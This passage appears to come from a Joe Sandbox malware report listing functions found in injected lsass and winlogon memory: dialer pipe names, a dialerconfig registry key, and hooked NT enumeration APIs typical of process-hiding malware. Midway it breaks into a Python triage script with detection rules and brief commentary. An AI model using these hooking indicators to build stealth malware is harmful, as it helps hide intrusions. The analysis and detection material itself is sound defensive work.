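• Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
• Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
• API ID: __std_exception_copy
• String ID: Locator'$riptor at (
• Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
• Instruction ID: 9cfed72d77cccaa36cf3e22940643e972630171375edc54bb3644584a963761a
Memory Dump Source
• Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
• Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
• API ID: FileType
• String ID: \\.\pipe\
• Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Memory Dump Source
• Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
• Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
"""


def parse_entries(text):
    """One dict per entry; 'API ID' / 'String ID' values become lists split on '$'."""
    entries, cur = [], None
    for line in (ln.strip() for ln in text.splitlines()):
        if line == "Memory Dump Source":
            cur = {}
            entries.append(cur)
        elif cur is not None and (m := FIELD_RE.match(line)):
            key, val = m.group(1), m.group(2)
            cur[key] = [v for v in val.split("$") if v] if key in ("API ID", "String ID") else val
    return entries


def snapshot_info(entry):
    """Process name, index and image base from the snapshot name, cross-checked with Source File."""
    m = SNAPSHOT_RE.search(entry.get("Snapshot File", ""))
    if not m:
        return None
    idx, src = int(m.group(1)), entry.get("Source File", "")
    return {"process_index": idx, "base": int(m.group(3), 16), "process": m.group(4),
            "consistent": bool(src) and int(src.split(".", 1)[0], 16) == idx}


def dedupe_by_opcode(entries):
    """Keep one entry per Opcode ID: the same code seen twice with different instruction hashes."""
    seen, kept = set(), []
    for e in entries:
        key = e.get("Opcode ID")
        if key and key in seen:
            continue
        seen.add(key)
        kept.append(e)
    return kept


# Analyst-chosen heuristics over indicators seen in this report: (API fragments, string items, label).
RULES = [
    (("ModuleName", "Address", "Proc"), ("NtQueryObject", "\\Device\\Nsi"),
     "NtQueryObject resolved by name beside the \\Device\\Nsi object path"),
    (("FileType",), ("\\\\.\\pipe\\",), "GetFileType paired with the \\\\.\\pipe\\ namespace string"),
]


def match_rules(entry, rules=RULES):
    """Labels of every rule whose API fragments and string items all occur in the entry."""
    api_blob = "$".join(entry.get("API ID", []))
    strings = set(entry.get("String ID", []))
    return [label for frags, items, label in rules
            if all(f in api_blob for f in frags) and all(s in strings for s in items)]


def triage(text, rules=RULES):
    """Deduplicated entries plus (process, opcode id prefix, label) findings for the report text."""
    entries = dedupe_by_opcode(parse_entries(text))
    findings = [((snapshot_info(e) or {}).get("process", "?"), e.get("Opcode ID", "")[:12], label)
                for e in entries for label in match_rules(e, rules)]
    return entries, findings


if __name__ == "__main__":
    kept, hits = triage(SAMPLE)
    print(f"{len(kept)} unique functions, {len(hits)} rule hits")
    for proc, opcode, label in hits:
        print(f"{proc:10} {opcode or '-':12} {label}")
```

Deduplicating on Opcode ID before applying rules keeps the two winlogon copies of the same exception-handling routine from being counted twice, and the "consistent" flag catches entries whose snapshot name and Source File disagree about the process index, which is the first thing to check before attributing a hooked function to lsass or winlogon. The rule table is deliberately tiny; a real triage set would be driven from the report's own signature section rather than hard-coded.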

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000002A29199CE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CEBC
                                                        • SetLastError.KERNEL32 ref: 000002A29199CED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000002A29199ECCC,?,?,?,?,000002A29199BF9F,?,?,?,?,?,000002A291997AB0), ref: 000002A29199CF2C
                                                          • Part of subcall function 000002A29199D6CC: HeapAlloc.KERNEL32 ref: 000002A29199D721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF54
                                                          • Part of subcall function 000002A29199D744: HeapFree.KERNEL32 ref: 000002A29199D75A
                                                          • Part of subcall function 000002A29199D744: GetLastError.KERNEL32 ref: 000002A29199D764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A2919A0A6B,?,?,?,000002A2919A045C,?,?,?,000002A29199C84F), ref: 000002A29199CF76
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D087
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A29199C7DE,?,?,?,?,?,?,?,?,000002A29199CF9D,?,?,00000001), ref: 000002A29199D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 2eda56979e5e09bf1eaaea1a055d2580c86bac67b708ba4e2ae130481bc55e5c
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: C5113061704666C7FAE8573FE79937B61816B4FFE4F384224942A066DEDE28844D8202
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: f80ffc22932428fa4e3cbc88985e60adca33b6c3b2487c09d5e61210d3ffa293
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: EA819E21700263C7FAD8AB6FE64939B6690A78FF80F7444259A054779EDF38C84D8B53
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 5b077497e61e3eaf08f735d87a2babf30c03001d38dd30611cea9d9a8ed7bffa
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 1E31E521312622D3FE91DB8FE60875622A4B74EFA0F6905259D2E07398EF39D09DC302
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: 23f971f6aa6706c2256635c771a537c12f52c91efb7c1af5dc6ceecc5ee62274
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: AB118E31310AA1C7F7908B1BF94831A66A0F38EFE4F644225EA2A877D4CF38C90C8741
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 78aa278ec88c86537f2b5306803016608d9432e31d0b705b3b66faa2d80037fb
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 3B115A2A304762C3FB949B2BE50826A62B0F74AF84F650028DE9907798EF2DC64DC705
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 8e6775f4180294222f22188b8baa7f2f2ca9f794fb603b8fb577a7d6741249f2
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: FCD19C36205B99C2FAB09B1AE59435B77A0F38DF88F204116EA8D47B69DF3CC559CB01
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: d9b6e3f3fbde7c1d9873550896ce399894800054be0f13c2b67ef489ea9a009b
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 7B319D22701B66C3FA94DF2BE64876B67A0FB4AF84F1840209E4847B59EF34D4AD8301
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 4a7941c75334ec3185a8439fab1463888cffeda500893dbf40a9a79e8ddde821
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: BD114F21341666C7FAE4573BE78D33B61925B5FFE4F3407249836476DEDE28840D8202
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 5a5af4342115806afc14c761473f91ccf1938b95f9de70327975ecfe1b508ef4
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: B4013521300A62C2FA949B5BA94835A63A1F78DFC4FA84035DE5A43798DE3CC98EC701
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 947c7fa1ad3ec27a09c19561f460c0d926b82a7c4141b4461b8e4805c66bb5eb
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: FD010965711762C7FBA49B2BE90C31B62B0BB4EF86F640428C95906794EF3DC14C8702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction ID: e4074c3d989006062b1011126d9b052f5ce7c95440880c57faee1aa528616484
                                                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction Fuzzy Hash: 25517E72701622CBFBA48B1EE94CB5A2795F34AF88F648528DA564778CDF35C84DC702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 05c4583ffae46600bed06886ddadac808394b260982dfb2ad06563bfe6178556
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: E4F05E20704BA2C3FA808F2BBA0C11A6260AB4EFC0F648120EE5607B58DE28C54E8701
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 532e30cbf3ed3c0db960dda60228f1adcd0baa93d67c2350fa8149c1815f2972
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 52F06261311A26C3FB548B2EE54D75B6320EB8FF61FA40219CA6B451E4DF2DC44DC302
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: a784433245ebc767c323d0d19b128198bb02bfc69fc0680bcae65617792c778e
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: 6A02BC32219B95C7F7A0CB5AF55435BB7A0F389B94F204016EA8E87B69DF78C458CB01
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 6946616450a21ddfee37c7bd35f5e43c0242158b3216ae6897bbf5740372dcf2
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: D861AE76619A55C7F6A08B1AF54831B77A0F389B44F600116EA8E4BBA8DF7CC55CCF02
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 10a7772116927c9e5d22d35f01076c4d3e78c743838986f952f5529fbe920956
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: AB1186FA730A33F3FAD4151FE44D36711806F5AB74EE84629A966062D6CF28C44D4102
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 53c64429bb941cceb4271d550a9b971859a65673c9f7bb57f83dceafb3562638
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 3011C122B10A73D3F6E6556EE65D36711807B7FBB8F3C0A24A976076D6CE24D84C8203
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 1bbfd92db6e95b8fc9539b16fb8632b4a2ed3b6d0598b1e6c73ff1e62b443b6d
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: A8618F36700663E3FAE59A6FE54C32B6AA2E783F40F754415CA0A037A4DF34C94DA203
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
